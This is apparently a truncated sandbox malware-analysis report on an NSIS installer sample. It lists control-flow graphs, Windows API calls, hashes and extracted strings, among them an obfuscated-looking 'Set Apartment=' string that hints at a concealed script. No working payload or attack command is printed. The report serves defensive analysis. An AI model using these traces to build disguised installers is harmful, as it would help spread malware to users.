                                                  • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                  • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                  • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                  APIs
                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                  • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                  • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                  • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                  • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                  • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                    • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                  • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                  • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                  • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 608394941-1650083594
                                                  • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                  • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                  • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                  • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • lstrcatW.KERNEL32(00000000,00000000,ConjunctionSku,004CB0B0,00000000,00000000), ref: 00401A76
                                                  • CompareFileTime.KERNEL32(-00000014,?,ConjunctionSku,ConjunctionSku,00000000,00000000,ConjunctionSku,004CB0B0,00000000,00000000), ref: 00401AA0
                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                  • String ID: ConjunctionSku$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                  • API String ID: 4286501637-3448434611
                                                  • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                  • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                  • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                  • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403598
                                                  • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                  • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                  Strings
                                                  • soft, xrefs: 00403675
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                  • Null, xrefs: 0040367E
                                                  • Inst, xrefs: 0040366C
                                                  • Error launching installer, xrefs: 004035D7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 4283519449-527102705
                                                  • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                  • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                  • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                  • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004033E7
                                                  • GetTickCount.KERNEL32 ref: 00403464
                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                  • wsprintfW.USER32 ref: 004034A4
                                                  • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                  • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                  Strings
                                                  • Set Apartment= EXTbTroops-Simultaneously-Keith-Beer-Delegation-IIAffecting-Phil-Tulsa-XutuPhilosophy-Combine-Scene-Delight-Wages-Trinity-wOParliament-Columnists-Prev-Whose-Pull-Wave-Convention-Monkey-ZwLaboratories-Dave-Silent-Stick-Forced-Worried-Be, xrefs: 004033A9
                                                  • X1C, xrefs: 0040343C
                                                  • ... %d%%, xrefs: 0040349E
                                                  • X1C, xrefs: 004033ED
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: CountFileTickWrite$wsprintf
                                                  • String ID: ... %d%%$Set Apartment= EXTbTroops-Simultaneously-Keith-Beer-Delegation-IIAffecting-Phil-Tulsa-XutuPhilosophy-Combine-Scene-Delight-Wages-Trinity-wOParliament-Columnists-Prev-Whose-Pull-Wave-Convention-Monkey-ZwLaboratories-Dave-Silent-Stick-Forced-Worried-Be$X1C$X1C
                                                  • API String ID: 651206458-4066529873
                                                  • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                  • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                  • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                  • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                  APIs
                                                  • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                  • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                  • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                  • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2740478559-0
                                                  • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                  • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                  • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                  • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f69 GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 745 401f6e-401f7b 734->745 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 751 402387-40238d GlobalFree 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 750 4030e3-4030f2 745->750 745->751 747->750 763 402708-40270e 748->763 751->750 763->750
                                                  APIs
                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                  • GlobalFree.KERNEL32(005D3510), ref: 00402387
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: FreeGloballstrcpyn
                                                  • String ID: ConjunctionSku$Exch: stack < %d elements$Pop: stack empty
                                                  • API String ID: 1459762280-3880665044
                                                  • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                  • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                  • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                  • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 766 402713-40273b call 406009 * 2 771 402746-402749 766->771 772 40273d-402743 call 40145c 766->772 774 402755-402758 771->774 775 40274b-402752 call 40145c 771->775 772->771 776 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 774->776 777 40275a-402761 call 40145c 774->777 775->774 777->776
                                                  APIs
                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                  • String ID: <RM>$ConjunctionSku$WriteINIStr: wrote [%s] %s=%s in %s
                                                  • API String ID: 247603264-3858038241
                                                  • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                  • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                  • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                  • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 873 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 884 402223-4030f2 call 4062a3 873->884 885 40220d-40221b call 4062a3 873->885 885->884
                                                  APIs
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  Strings
                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
